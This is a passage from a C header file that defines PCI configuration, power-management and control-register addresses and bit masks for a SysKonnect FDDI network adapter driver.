PCI_BASE_2ND 32 bit 2nd Base address */ #define PCI_IOBASE 0xffffff00L /* Bit 31..8: I/O Base address */ #define PCI_IOSIZE 0x000000fcL /* Bit 7..2: I/O Size Requirements */ #define PCI_IOSPACE 0x00000001L /* Bit 0: I/O Space Indicator */ /* PCI_SUB_VID 16 bit Subsystem Vendor ID */ /* PCI_SUB_ID 16 bit Subsystem ID */ /* PCI_BASE_ROM 32 bit Expansion ROM Base Address */ #define PCI_ROMBASE 0xfffe0000L /* Bit 31..17: ROM BASE address (1st) */ #define PCI_ROMBASZ 0x0001c000L /* Bit 16..14: Treat as BASE or SIZE */ #define PCI_ROMSIZE 0x00003800L /* Bit 13..11: ROM Size Requirements */ #define PCI_ROMEN 0x00000001L /* Bit 0: Address Decode enable */ /* PCI_CAP_PTR 8 bit New Capabilities Pointers */ /* PCI_IRQ_LINE 8 bit Interrupt Line */ /* PCI_IRQ_PIN 8 bit Interrupt Pin */ /* PCI_MIN_GNT 8 bit Min_Gnt */ /* PCI_MAX_LAT 8 bit Max_Lat */ /* Device Dependent Region */ /* PCI_OUR_REG (DV) 32 bit Our Register */ /* PCI_OUR_REG_1 (ML) 32 bit Our Register 1 */ /* Bit 31..29: reserved */ #define PCI_PATCH_DIR (3L<<27) /*(DV) Bit 28..27: Ext Patchs direction */ #define PCI_PATCH_DIR_0 (1L<<27) /*(DV) Type of the pins EXT_PATCHS<1..0> */ #define PCI_PATCH_DIR_1 (1L<<28) /* 0 = input */ /* 1 = output */ #define PCI_EXT_PATCHS (3L<<25) /*(DV) Bit 26..25: Extended Patches */ #define PCI_EXT_PATCH_0 (1L<<25) /*(DV) */ #define PCI_EXT_PATCH_1 (1L<<26) /* CLK for MicroWire (ML) */ #define PCI_VIO (1L<<25) /*(ML) */ #define PCI_EN_BOOT (1L<<24) /* Bit 24: Enable BOOT via ROM */ /* 1 = Don't boot with ROM */ /* 0 = Boot with ROM */ #define PCI_EN_IO (1L<<23) /* Bit 23: Mapping to IO space */ #define PCI_EN_FPROM (1L<<22) /* Bit 22: FLASH mapped to mem? */ /* 1 = Map Flash to Memory */ /* 0 = Disable all addr. decoding */ #define PCI_PAGESIZE (3L<<20) /* Bit 21..20: FLASH Page Size */ #define PCI_PAGE_16 (0L<<20) /* 16 k pages */ #define PCI_PAGE_32K (1L<<20) /* 32 k pages */ #define PCI_PAGE_64K (2L<<20) /* 64 k pages */ #define PCI_PAGE_128K (3L<<20) /* 128 k pages */ /* Bit 19: reserved (ML) and (DV) */ #define PCI_PAGEREG (7L<<16) /* Bit 18..16: Page Register */ /* Bit 15: reserved */ #define PCI_FORCE_BE (1L<<14) /* Bit 14: Assert all BEs on MR */ #define PCI_DIS_MRL (1L<<13) /* Bit 13: Disable Mem R Line */ #define PCI_DIS_MRM (1L<<12) /* Bit 12: Disable Mem R multip */ #define PCI_DIS_MWI (1L<<11) /* Bit 11: Disable Mem W & inv */ #define PCI_DISC_CLS (1L<<10) /* Bit 10: Disc: cacheLsz bound */ #define PCI_BURST_DIS (1L<<9) /* Bit 9: Burst Disable */ #define PCI_BYTE_SWAP (1L<<8) /*(DV) Bit 8: Byte Swap in DATA */ #define PCI_SKEW_DAS (0xfL<<4) /* Bit 7..4: Skew Ctrl, DAS Ext */ #define PCI_SKEW_BASE (0xfL<<0) /* Bit 3..0: Skew Ctrl, Base */ /* PCI_OUR_REG_2 (ML) 32 bit Our Register 2 (Monalisa only) */ #define PCI_VPD_WR_TH (0xffL<<24) /* Bit 24..31 VPD Write Threshold */ #define PCI_DEV_SEL (0x7fL<<17) /* Bit 17..23 EEPROM Device Select */ #define PCI_VPD_ROM_SZ (7L<<14) /* Bit 14..16 VPD ROM Size */ /* Bit 12..13 reserved */ #define PCI_PATCH_DIR2 (0xfL<<8) /* Bit 8..11 Ext Patchs dir 2..5 */ #define PCI_PATCH_DIR_2 (1L<<8) /* Bit 8 CS for MicroWire */ #define PCI_PATCH_DIR_3 (1L<<9) #define PCI_PATCH_DIR_4 (1L<<10) #define PCI_PATCH_DIR_5 (1L<<11) #define PCI_EXT_PATCHS2 (0xfL<<4) /* Bit 4..7 Extended Patches */ #define PCI_EXT_PATCH_2 (1L<<4) /* Bit 4 CS for MicroWire */ #define PCI_EXT_PATCH_3 (1L<<5) #define PCI_EXT_PATCH_4 (1L<<6) #define PCI_EXT_PATCH_5 (1L<<7) #define PCI_EN_DUMMY_RD (1L<<3) /* Bit 3 Enable Dummy Read */ #define PCI_REV_DESC (1L<<2) /* Bit 2 Reverse Desc. Bytes */ #define PCI_USEADDR64 (1L<<1) /* Bit 1 Use 64 Bit Addresse */ #define PCI_USEDATA64 (1L<<0) /* Bit 0 Use 64 Bit Data bus ext*/ /* Power Management Region */ /* PCI_PM_CAP_ID 8 bit (ML) Power Management Cap. ID */ /* PCI_PM_NITEM 8 bit (ML) Next Item Ptr */ /* PCI_PM_CAP_REG 16 bit (ML) Power Management Capabilities*/ #define PCI_PME_SUP (0x1f<<11) /* Bit 11..15 PM Manag. Event Support*/ #define PCI_PM_D2_SUB (1<<10) /* Bit 10 D2 Support Bit */ #define PCI_PM_D1_SUB (1<<9) /* Bit 9 D1 Support Bit */ /* Bit 6..8 reserved */ #define PCI_PM_DSI (1<<5) /* Bit 5 Device Specific Init.*/ #define PCI_PM_APS (1<<4) /* Bit 4 Auxialiary Power Src */ #define PCI_PME_CLOCK (1<<3) /* Bit 3 PM Event Clock */ #define PCI_PM_VER (7<<0) /* Bit 0..2 PM PCI Spec. version */ /* PCI_PM_CTL_STS 16 bit (ML) Power Manag. Control/Status */ #define PCI_PME_STATUS (1<<15) /* Bit 15 PFA doesn't sup. PME#*/ #define PCI_PM_DAT_SCL (3<<13) /* Bit 13..14 dat reg Scaling factor */ #define PCI_PM_DAT_SEL (0xf<<9) /* Bit 9..12 PM data selector field */ /* Bit 7.. 2 reserved */ #define PCI_PM_STATE (3<<0) /* Bit 0.. 1 Power Management State */ #define PCI_PM_STATE_D0 (0<<0) /* D0: Operational (default) */ #define PCI_PM_STATE_D1 (1<<0) /* D1: not supported */ #define PCI_PM_STATE_D2 (2<<0) /* D2: not supported */ #define PCI_PM_STATE_D3 (3<<0) /* D3: HOT, Power Down and Reset */ /* PCI_PM_DAT_REG 8 bit (ML) Power Manag. Data Register */ /* VPD Region */ /* PCI_VPD_CAP_ID 8 bit (ML) VPD Cap. ID */ /* PCI_VPD_NITEM 8 bit (ML) Next Item Ptr */ /* PCI_VPD_ADR_REG 16 bit (ML) VPD Address Register */ #define PCI_VPD_FLAG (1<<15) /* Bit 15 starts VPD rd/wd cycle*/ /* PCI_VPD_DAT_REG 32 bit (ML) VPD Data Register */ /* * Control Register File: * Bank 0 */ #define B0_RAP 0x0000 /* 8 bit register address port */ /* 0x0001 - 0x0003: reserved */ #define B0_CTRL 0x0004 /* 8 bit control register */ #define B0_DAS 0x0005 /* 8 Bit control register (DAS) */ #define B0_LED 0x0006 /* 8 Bit LED register */ #define B0_TST_CTRL 0x0007 /* 8 bit test control register */ #define B0_ISRC 0x0008 /* 32 bit Interrupt source register */ #define B0_IMSK 0x000c /* 32 bit Interrupt mask register */ /* 0x0010 - 0x006b: formac+ (supernet_3) fequently used registers */ #define B0_CMDREG1 0x0010 /* write command reg 1 instruction */ #define B0_CMDREG2 0x0014 /* write command reg 2 instruction */ #define B0_ST1U 0x0010 /* read upper 16-bit of status reg 1 */ #define B0_ST1L 0x0014 /* read lower 16-bit of status reg 1 */ #define B0_ST2U 0x0018 /* read upper 16-bit of status reg 2 */ #define B0_ST2L 0x001c /* read lower 16-bit of status reg 2 */ #define B0_MARR 0x0020 /* r/w the memory read addr register */ #define B0_MARW 0x0024 /* r/w the memory write addr register*/ #define B0_MDRU 0x0028 /* r/w upper 16-bit of mem. data reg */ #define B0_MDRL 0x002c /* r/w lower 16-bit of mem. data reg */ #define B0_MDREG3 0x0030 /* r/w Mode Register 3 */ #define B0_ST3U 0x0034 /* read upper 16-bit of status reg 3 */ #define B0_ST3L 0x0038 /* read lower 16-bit of status reg 3 */ #define B0_IMSK3U 0x003c /* r/w upper 16-bit of IMSK reg 3 */ #define B0_IMSK3L 0x0040 /* r/w lower 16-bit of IMSK reg 3 */ #define B0_IVR 0x0044 /* read Interrupt Vector register */ #define B0_IMR 0x0048 /* r/w Interrupt mask register */ /* 0x4c Hidden */ #define B0_CNTRL_A 0x0050 /* control register A (r/w) */ #define B0_CNTRL_B 0x0054 /* control register B (r/w) */ #define B0_INTR_MASK 0x0058 /* interrupt mask (r/w) */ #define B0_XMIT_VECTOR 0x005c /* transmit vector register (r/w) */ #define B0_STATUS_A 0x0060 /* status register A (read only) */ #define B0_STATUS_B 0x0064 /* status register B (read only) */ #define B0_CNTRL_C 0x0068 /* control register C (r/w) */ #define B0_MDREG1 0x006c /* r/w Mode Register 1 */ #define B0_R1_CSR 0x0070 /* 32 bit BMU control/status reg (rec q 1) */ #define B0_R2_CSR 0x0074 /* 32 bit BMU control/status reg (rec q 2)(DV)*/ #define B0_XA_CSR 0x0078 /* 32 bit BMU control/status reg (a xmit q) */ #define B0_XS_CSR 0x007c /* 32 bit BMU control/status reg (s xmit q) */ /* * Bank 1 * - completely empty (this is the RAP Block window) * Note: if RAP = 1 this page is reserved */ /* * Bank 2 */ #define B2_MAC_0 0x0100 /* 8 bit MAC address Byte 0 */ #define B2_MAC_1 0x0101 /* 8 bit MAC address Byte 1 */ #define B2_MAC_2 0x0102 /* 8 bit MAC address Byte 2 */ #define B2_MAC_3 0x0103 /* 8 bit MAC address Byte 3 */ #define B2_MAC_4 0x0104 /* 8 bit MAC address Byte 4 */ #define B2_MAC_5 0x0105 /* 8 bit MAC address Byte 5 */ #define B2_MAC_6 0x0106 /* 8 bit MAC address Byte 6 (== 0) (DV) */ #define B2_MAC_7 0x0107 /* 8 bit MAC address Byte 7 (== 0) (DV) */ #define B2_CONN_TYP 0x0108 /* 8 bit Connector type */ #define B2_PMD_TYP 0x0109 /* 8 bit PMD type */ /* 0x010a - 0x010b: reserved */ /* Eprom registers are currently of no use */ #define B2_E_0 0x010c /* 8 bit EPROM Byte 0 */ #define B2_E_1 0x010d /* 8 bit EPROM Byte 1 */ #define B2_E_2 0x010e /* 8 bit EPROM Byte 2 */ #define B2_E_3 0x010f /* 8 bit EPROM Byte 3 */ #define B2_FAR 0x0110 /* 32 bit Flash-Prom Address Register/Counter */ #define B2_FDP 0x0114 /* 8 bit Flash-Prom Data Port */ /* 0x0115 - 0x0117: reserved */ #define B2_LD_CRTL 0x0118 /* 8 bit loader control */ #define B2_LD_TEST 0x0119 /* 8 bit loader test */ /* 0x011a - 0x011f: reserved */ #define B2_TI_INI 0x0120 /* 32 bit Timer init value */ #define B2_TI_VAL 0x0124 /* 32 bit Timer value */ #define B2_TI_CRTL 0x0128 /* 8 bit Timer control */ #define B2_TI_TEST 0x0129 /* 8 Bit Timer Test */ /* 0x012a - 0x012f: reserved */ #define B2_WDOG_INI 0x0130 /* 32 bit Watchdog init value */ #define B2_WDOG_VAL 0x0134 /* 32 bit Watchdog value */ #define B2_WDOG_CRTL 0x0138 /* 8 bit Watchdog control */ #define B2_WDOG_TEST 0x0139 /* 8 Bit Watchdog Test */ /* 0x013a - 0x013f: reserved */ #define B2_RTM_INI 0x0140 /* 32 bit RTM init value */ #define B2_RTM_VAL 0x0144 /* 32 bit RTM value */ #define B2_RTM_CRTL 0x0148 /* 8 bit RTM control */ #define B2_RTM_TEST 0x0149 /* 8 Bit RTM Test */ #define B2_TOK_COUNT 0x014c /* (ML) 32 bit Token Counter */ #define B2_DESC_ADDR_H 0x0150 /* (ML) 32 bit Desciptor Base Addr Reg High */ #define B2_CTRL_2 0x0154 /* (ML) 8 bit Control Register 2 */ #define B2_IFACE_REG 0x0155 /* (ML) 8 bit Interface Register */ /* 0x0156: reserved */ #define B2_TST_CTRL_2 0x0157 /* (ML) 8 bit Test Control Register 2 */ #define B2_I2C_CTRL 0x0158 /* (ML) 32 bit I2C Control Register */ #define B2_I2C_DATA 0x015c /* (ML) 32 bit I2C Data Register */ #define B2_IRQ_MOD_INI 0x0160 /* (ML) 32 bit IRQ Moderation Timer Init Reg. */ #define B2_IRQ_MOD_VAL 0x0164 /* (ML) 32 bit IRQ Moderation Timer Value */ #define B2_IRQ_MOD_CTRL 0x0168 /* (ML) 8 bit IRQ Moderation Timer Control */ #define B2_IRQ_MOD_TEST 0x0169 /* (ML) 8 bit IRQ Moderation Timer Test */ /* 0x016a - 0x017f: reserved */ /* * Bank 3 */ /* * This is a copy of the Configuration register file (lower half) */ #define B3_CFG_SPC 0x180 /* * Bank 4 */ #define B4_R1_D 0x0200 /* 4*32 bit current receive Descriptor */ #define B4_R1_DA 0x0210 /* 32 bit current rec desc address */ #define B4_R1_AC 0x0214 /* 32 bit current receive Address Count */ #define B4_R1_BC 0x0218 /* 32 bit current receive Byte Counter */ #define B4_R1_CSR 0x021c /* 32 bit BMU Control/Status Register */ #define B4_R1_F 0x0220 /* 32 bit flag register */ #define B4_R1_T1 0x0224 /* 32 bit Test Register 1 */ #define B4_R1_T1_TR 0x0224 /* 8 bit Test Register 1 TR */ #define B4_R1_T1_WR 0x0225 /* 8 bit Test Register 1 WR */ #define B4_R1_T1_RD 0x0226 /* 8 bit Test Register 1 RD */ #define B4_R1_T1_SV 0x0227 /* 8 bit Test Register 1 SV */ #define B4_R1_T2 0x0228 /* 32 bit Test Register 2 */ #define B4_R1_T3 0x022c /* 32 bit Test Register 3 */ #define B4_R1_DA_H 0x0230 /* (ML) 32 bit Curr Rx Desc Address High */ #define B4_R1_AC_H 0x0234 /* (ML) 32 bit Curr Addr Counter High dword */ /* 0x0238 - 0x023f: reserved */ /* Receive queue 2 is removed on Monalisa */ #define B4_R2_D 0x0240 /* 4*32 bit current receive Descriptor (q2) */ #define B4_R2_DA 0x0250 /* 32 bit current rec desc address (q2) */ #define B4_R2_AC 0x0254 /* 32 bit current receive Address Count (q2) */ #define B4_R2_BC 0x0258 /* 32 bit current receive Byte Counter (q2) */ #define B4_R2_CSR 0x025c /* 32 bit BMU Control/Status Register (q2) */ #define B4_R2_F 0x0260 /* 32 bit flag register (q2) */ #define B4_R2_T1 0x0264 /* 32 bit Test Register 1 (q2) */ #define B4_R2_T1_TR 0x0264 /* 8 bit Test Register 1 TR (q2) */ #define B4_R2_T1_WR 0x0265 /* 8 bit Test Register 1 WR (q2) */ #define B4_R2_T1_RD 0x0266 /* 8 bit Test Register 1 RD (q2) */ #define B4_R2_T1_SV 0x0267 /* 8 bit Test Register 1 SV (q2) */ #define B4_R2_T2 0x0268 /* 32 bit Test Register 2 (q2) */ #define B4_R2_T3 0x026c /* 32 bit Test Register 3 (q2) */ /* 0x0270 - 0x027c: reserved */ /* * Bank 5 */ #define B5_XA_D 0x0280 /* 4*32 bit current transmit Descriptor (xa) */ #define B5_XA_DA 0x0290 /* 32 bit current tx desc address (xa) */ #define B5_XA_AC 0x0294 /* 32 bit current tx Address Count (xa) */ #define B5_XA_BC 0x0298 /* 32 bit current tx Byte Counter (xa) */ #define B5_XA_CSR 0x029c /* 32 bit BMU Control/Status Register (xa) */ #define B5_XA_F 0x02a0 /* 32 bit flag register (xa) */ #define B5_XA_T1 0x02a4 /* 32 bit Test Register 1 (xa) */ #define B5_XA_T1_TR 0x02a4 /* 8 bit Test Register 1 TR (xa) */ #define B5_XA_T1_WR 0x02a5 /* 8 bit Test Register 1 WR (xa) */ #define B5_XA_T1_RD 0x02a6 /* 8 bit Test Register 1 RD (xa) */ #define B5_XA_T1_SV 0x02a7 /* 8 bit Test Register 1 SV (xa) */ #define B5_XA_T2 0x02a8 /* 32 bit Test Register 2 (xa) */ #define B5_XA_T3 0x02ac /* 32 bit Test Register 3 (xa) */ #define B5_XA_DA_H 0x02b0 /* (ML) 32 bit Curr Tx Desc Address High */ #define B5_XA_AC_H 0x02b4 /* (ML) 32 bit Curr Addr Counter High dword */ /* 0x02b8 - 0x02bc: reserved */ #define B5_XS_D 0x02c0 /* 4*32 bit current transmit Descriptor (xs) */ #define B5_XS_DA 0x02d0 /* 32 bit current tx desc address (xs) */ #define B5_XS_AC 0x02d4 /* 32 bit current transmit Address Count(xs) */ #define B5_XS_BC 0x02d8 /* 32 bit current transmit Byte Counter (xs) */ #define B5_XS_CSR 0x02dc /* 32 bit BMU Control/Status Register (xs) */ #define B5_XS_F 0x02e0 /* 32 bit flag register (xs) */ #define B5_XS_T1 0x02e4 /* 32 bit Test Register 1 (xs) */ #define B5_XS_T1_TR 0x02e4 /* 8 bit Test Register 1 TR (xs) */ #define B5_XS_T1_WR 0x02e5 /* 8 bit Test Register 1 WR (xs) */ #define B5_XS_T1_RD 0x02e6 /* 8 bit Test Register 1 RD (xs) */ #define B5_XS_T1_SV 0x02e7 /* 8 bit Test Register 1 SV (xs) */ #define B5_XS_T2 0x02e8 /* 32 bit Test Register 2 (xs) */ #define B5_XS_T3 0x02ec /* 32 bit Test Register 3 (xs) */ #define B5_XS_DA_H 0x02f0 /* (ML) 32 bit Curr Tx Desc Address High */ #define B5_XS_AC_H 0x02f4 /* (ML) 32 bit Curr Addr Counter High dword */ /* 0x02f8 - 0x02fc: reserved */ /* * Bank 6 */ /* External PLC-S registers (SN2 compatibility for DV) */ /* External registers (ML) */ #define B6_EXT_REG 0x300 /* * Bank 7 */ /* DAS PLC-S Registers */ /* * Bank 8 - 15 */ /* IFCP registers */ /*---------------------------------------------------------------------------*/ /* Definitions of the Bits in the registers */ /* B0_RAP 16 bit register address port */ #define RAP_RAP 0x0f /* Bit 3..0: 0 = block0, .., f = block15 */ /* B0_CTRL 8 bit control register */ #define CTRL_FDDI_CLR (1<<7) /* Bit 7: (ML) Clear FDDI Reset */ #define CTRL_FDDI_SET (1<<6) /* Bit 6: (ML) Set FDDI Reset */ #define CTRL_HPI_CLR (1<<5) /* Bit 5: Clear HPI SM reset */ #define CTRL_HPI_SET (1<<4) /* Bit 4: Set HPI SM reset */ #define CTRL_MRST_CLR (1<<3) /* Bit 3: Clear Master reset */ #define CTRL_MRST_SET (1<<2) /* Bit 2: Set Master reset */ #define CTRL_RST_CLR (1<<1) /* Bit 1: Clear Software reset */ #define CTRL_RST_SET (1<<0) /* Bit 0: Set Software reset */ /* B0_DAS 8 Bit control register (DAS) */ #define BUS_CLOCK (1<<7) /* Bit 7: (ML) Bus Clock 0/1 = 33/66MHz */ #define BUS_SLOT_SZ (1<<6) /* Bit 6: (ML) Slot Size 0/1 = 32/64 bit slot*/ /* Bit 5..4: reserved */ #define DAS_AVAIL (1<<3) /* Bit 3: 1 = DAS, 0 = SAS */ #define DAS_BYP_ST (1<<2) /* Bit 2: 1 = avail,SAS, 0 = not avail */ #define DAS_BYP_INS (1<<1) /* Bit 1: 1 = insert Bypass */ #define DAS_BYP_RMV (1<<0) /* Bit 0: 1 = remove Bypass */ /* B0_LED 8 Bit LED register */ /* Bit 7..6: reserved */ #define LED_2_ON (1<<5) /* Bit 5: 1 = switch LED_2 on (left,gn)*/ #define LED_2_OFF (1<<4) /* Bit 4: 1 = switch LED_2 off */ #define LED_1_ON (1<<3) /* Bit 3: 1 = switch LED_1 on (mid,yel)*/ #define LED_1_OFF (1<<2) /* Bit 2: 1 = switch LED_1 off */ #define LED_0_ON (1<<1) /* Bit 1: 1 = switch LED_0 on (rght,gn)*/ #define LED_0_OFF (1<<0) /* Bit 0: 1 = switch LED_0 off */ /* This hardware defines are very ugly therefore we define some others */ #define LED_GA_ON LED_2_ON /* S port = A port */ #define LED_GA_OFF LED_2_OFF /* S port = A port */ #define LED_MY_ON LED_1_ON #define LED_MY_OFF LED_1_OFF #define LED_GB_ON LED_0_ON #define LED_GB_OFF LED_0_OFF /* B0_TST_CTRL 8 bit test control register */ #define TST_FRC_DPERR_MR (1<<7) /* Bit 7: force DATAPERR on MST RE. */ #define TST_FRC_DPERR_MW (1<<6) /* Bit 6: force DATAPERR on MST WR. */ #define TST_FRC_DPERR_TR (1<<5) /* Bit 5: force DATAPERR on TRG RE. */ #define TST_FRC_DPERR_TW (1<<4) /* Bit 4: force DATAPERR on TRG WR. */ #define TST_FRC_APERR_M (1<<3) /* Bit 3: force ADDRPERR on MST */ #define TST_FRC_APERR_T (1<<2) /* Bit 2: force ADDRPERR on TRG */ #define TST_CFG_WRITE_ON (1<<1) /* Bit 1: ena configuration reg. WR */ #define TST_CFG_WRITE_OFF (1<<0) /* Bit 0: dis configuration reg. WR */ /* B0_ISRC 32 bit Interrupt source register */ /* Bit 31..28: reserved */ #define IS_I2C_READY (1L<<27) /* Bit 27: (ML) IRQ on end of I2C tx */ #define IS_IRQ_SW (1L<<26) /* Bit 26: (ML) SW forced IRQ */ #define IS_EXT_REG (1L<<25) /* Bit 25: (ML) IRQ from external reg*/ #define IS_IRQ_STAT (1L<<24) /* Bit 24: IRQ status exception */ /* PERR, RMABORT, RTABORT DATAPERR */ #define IS_IRQ_MST_ERR (1L<<23) /* Bit 23: IRQ master error */ /* RMABORT, RTABORT, DATAPERR */ #define IS_TIMINT (1L<<22) /* Bit 22: IRQ_TIMER */ #define IS_TOKEN (1L<<21) /* Bit 21: IRQ_RTM */ /* * Note: The DAS is our First Port (!=PA) */ #define IS_PLINT1 (1L<<20) /* Bit 20: IRQ_PHY_DAS */ #define IS_PLINT2 (1L<<19) /* Bit 19: IRQ_IFCP_4 */ #define IS_MINTR3 (1L<<18) /* Bit 18: IRQ_IFCP_3/IRQ_PHY */ #define IS_MINTR2 (1L<<17) /* Bit 17: IRQ_IFCP_2/IRQ_MAC_2 */ #define IS_MINTR1 (1L<<16) /* Bit 16: IRQ_IFCP_1/IRQ_MAC_1 */ /* Receive Queue 1 */ #define IS_R1_P (1L<<15) /* Bit 15: Parity Error (q1) */ #define IS_R1_B (1L<<14) /* Bit 14: End of Buffer (q1) */ #define IS_R1_F (1L<<13) /* Bit 13: End of Frame (q1) */ #define IS_R1_C (1L<<12) /* Bit 12: Encoding Error (q1) */ /* Receive Queue 2 */ #define IS_R2_P (1L<<11) /* Bit 11: (DV) Parity Error (q2) */ #define IS_R2_B (1L<<10) /* Bit 10: (DV) End of Buffer (q2) */ #define IS_R2_F (1L<<9) /* Bit 9: (DV) End of Frame (q2) */ #define IS_R2_C (1L<<8) /* Bit 8: (DV) Encoding Error (q2) */ /* Asynchronous Transmit queue */ /* Bit 7: reserved */ #define IS_XA_B (1L<<6) /* Bit 6: End of Buffer (xa) */ #define IS_XA_F (1L<<5) /* Bit 5: End of Frame (xa) */ #define IS_XA_C (1L<<4) /* Bit 4: Encoding Error (xa) */ /* Synchronous Transmit queue */ /* Bit 3: reserved */ #define IS_XS_B (1L<<2) /* Bit 2: End of Buffer (xs) */ #define IS_XS_F (1L<<1) /* Bit 1: End of Frame (xs) */ #define IS_XS_C (1L<<0) /* Bit 0: Encoding Error (xs) */ /* * Define all valid interrupt source Bits from GET_ISR () */ #define ALL_IRSR 0x01ffff77L /* (DV) */ #define ALL_IRSR_ML 0x0ffff077L /* (ML) */ /* B0_IMSK 32 bit Interrupt mask register */ /* * The Bit definnition of this register are the same as of the interrupt * source register. These definition are directly derived from the Hardware * spec. */ /* Bit 31..28: reserved */ #define IRQ_I2C_READY (1L<<27) /* Bit 27: (ML) IRQ on end of I2C tx */ #define IRQ_SW (1L<<26) /* Bit 26: (ML) SW forced IRQ */ #define IRQ_EXT_REG (1L<<25) /* Bit 25: (ML) IRQ from external reg*/ #define IRQ_STAT (1L<<24) /* Bit 24: IRQ status exception */ /* PERR, RMABORT, RTABORT DATAPERR */ #define IRQ_MST_ERR (1L<<23) /* Bit 23: IRQ master error */ /* RMABORT, RTABORT, DATAPERR */ #define IRQ_TIMER (1L<<22) /* Bit 22: IRQ_TIMER */ #define IRQ_RTM (1L<<21) /* Bit 21: IRQ_RTM */ #define IRQ_DAS (1L<<20) /* Bit 20: IRQ_PHY_DAS */ #define IRQ_IFCP_4 (1L<<19) /* Bit 19: IRQ_IFCP_4 */ #define IRQ_IFCP_3 (1L<<18) /* Bit 18: IRQ_IFCP_3/IRQ_PHY */ #define IRQ_IFCP_2 (1L<<17) /* Bit 17: IRQ_IFCP_2/IRQ_MAC_2 */ #define IRQ_IFCP_1 (1L<<16) /* Bit 16: IRQ_IFCP_1/IRQ_MAC_1 */ /* Receive Queue 1 */ #define IRQ_R1_P (1L<<15) /* Bit 15: Parity Error (q1) */ #define IRQ_R1_B (1L<<14) /* Bit 14: End of Buffer (q1) */ #define IRQ_R1_F (1L<<13) /* Bit 13: End of Frame (q1) */ #define IRQ_R1_C (1L<<12) /* Bit 12: Encoding Error (q1) */ /* Receive Queue 2 */ #define IRQ_R2_P (1L<<11) /* Bit 11: (DV) Parity Error (q2) */ #define IRQ_R2_B (1L<<10) /* Bit 10: (DV) End of Buffer (q2) */ #define IRQ_R2_F (1L<<9) /* Bit 9: (DV) End of Frame (q2) */ #define IRQ_R2_C (1L<<8) /* Bit 8: (DV) Encoding Error (q2) */ /* Asynchronous Transmit queue */ /* Bit 7: reserved */ #define IRQ_XA_B (1L<<6) /* Bit 6: End of Buffer (xa) */ #define IRQ_XA_F (1L<<5) /* Bit 5: End of Frame (xa) */ #define IRQ_XA_C (1L<<4) /* Bit 4: Encoding Error (xa) */ /* Synchronous Transmit queue */ /* Bit 3: reserved */ #define IRQ_XS_B (1L<<2) /* Bit 2: End of Buffer (xs) */ #define IRQ_XS_F (1L<<1) /* Bit 1: End of Frame (xs) */ #define IRQ_XS_C (1L<<0) /* Bit 0: Encoding Error (xs) */ /* 0x0010 - 0x006b: formac+ (supernet_3) fequently used registers */ /* B0_R1_CSR 32 bit BMU control/status reg (rec q 1 ) */ /* B0_R2_CSR 32 bit BMU control/status reg (rec q 2 ) */ /* B0_XA_CSR 32 bit BMU control/status reg (a xmit q ) */ /* B0_XS_CSR 32 bit BMU control/status reg (s xmit q ) */ /* The registers are the same as B4_R1_CSR, B4_R2_CSR, B5_Xa_CSR, B5_XS_CSR */ /* B2_MAC_0 8 bit MAC address Byte 0 */ /* B2_MAC_1 8 bit MAC address Byte 1 */ /* B2_MAC_2 8 bit MAC address Byte 2 */ /* B2_MAC_3 8 bit MAC address Byte 3 */ /* B2_MAC_4 8 bit MAC address Byte 4 */ /* B2_MAC_5 8 bit MAC address Byte 5 */ /* B2_MAC_6 8 bit MAC address Byte 6 (== 0) (DV) */ /* B2_MAC_7 8 bit MAC address Byte 7 (== 0) (DV) */ /* B2_CONN_TYP 8 bit Connector type */ /* B2_PMD_TYP 8 bit PMD type */ /* Values of connector and PMD type comply to SysKonnect internal std */ /* The EPROM register are currently of no use */ /* B2_E_0 8 bit EPROM Byte 0 */ /* B2_E_1 8 bit EPROM Byte 1 */ /* B2_E_2 8 bit EPROM Byte 2 */ /* B2_E_3 8 bit EPROM Byte 3 */ /* B2_FAR 32 bit Flash-Prom Address Register/Counter */ #define FAR_ADDR 0x1ffffL /* Bit 16..0: FPROM Address mask */ /* B2_FDP 8 bit Flash-Prom Data Port */ /* B2_LD_CRTL 8 bit loader control */ /* Bits are currently reserved */ /* B2_LD_TEST 8 bit loader test */ #define LD_T_ON (1<<3) /* Bit 3: Loader Testmode on */ #define LD_T_OFF (1<<2) /* Bit 2: Loader Testmode off */ #define LD_T_STEP (1<<1) /* Bit 1: Decrement FPROM addr. Counter */ #define LD_START (1<<0) /* Bit 0: Start loading FPROM */ /* B2_TI_INI 32 bit Timer init value */ /* B2_TI_VAL 32 bit Timer value */ /* B2_TI_CRTL 8 bit Timer control */ /* B2_TI_TEST 8 Bit Timer Test */ /* B2_WDOG_INI 32 bit Watchdog init value */ /* B2_WDOG_VAL 32 bit Watchdog value */ /* B2_WDOG_CRTL 8 bit Watchdog control */ /* B2_WDOG_TEST 8 Bit Watchdog Test */ /* B2_RTM_INI 32 bit RTM init value */ /* B2_RTM_VAL 32 bit RTM value */ /* B2_RTM_CRTL 8 bit RTM control */ /* B2_RTM_TEST 8 Bit RTM Test */ /* B2_<TIM>_CRTL 8 bit <TIM> control */ /* B2_IRQ_MOD_INI 32 bit IRQ Moderation Timer Init Reg. (ML) */ /* B2_IRQ_MOD_VAL 32 bit IRQ Moderation Timer Value (ML) */ /* B2_IRQ_MOD_CTRL 8 bit IRQ Moderation Timer Control (ML) */ /* B2_IRQ_MOD_TEST 8 bit IRQ Moderation Timer Test (ML) */ #define GET_TOK_CT (1<<4) /* Bit 4: Get the Token Counter (RTM) */ #define TIM_RES_TOK (1<<3) /* Bit 3: RTM Status: 1 == restricted */ #define TIM_ALARM (1<<3) /* Bit 3: Timer Alarm (WDOG) */ #define TIM_START (1<<2) /* Bit 2: Start Timer (TI,WDOG,RTM,IRQ_MOD)*/ #define TIM_STOP (1<<1) /* Bit 1: Stop Timer (TI,WDOG,RTM,IRQ_MOD) */ #define TIM_CL_IRQ (1<<0) /* Bit 0: Clear Timer IRQ (TI,WDOG,RTM) */ /* B2_<TIM>_TEST 8 Bit <TIM> Test */ #define TIM_T_ON (1<<2) /* Bit 2: Test mode on (TI,WDOG,RTM,IRQ_MOD) */ #define TIM_T_OFF (1<<1) /* Bit 1: Test mode off (TI,WDOG,RTM,IRQ_MOD) */ #define TIM_T_STEP (1<<0) /* Bit 0: Test step (TI,WDOG,RTM,IRQ_MOD) */ /* B2_TOK_COUNT 0x014c (ML) 32 bit Token Counter */ /* B2_DESC_ADDR_H 0x0150 (ML) 32 bit Desciptor Base Addr Reg High */ /* B2_CTRL_2 0x0154 (ML) 8 bit Control Register 2 */ /* Bit 7..5: reserved */ #define CTRL_CL_I2C_IRQ (1<<4) /* Bit 4: Clear I2C IRQ */ #define CTRL_ST_SW_IRQ (1<<3) /* Bit 3: Set IRQ SW Request */ #define CTRL_CL_SW_IRQ (1<<2) 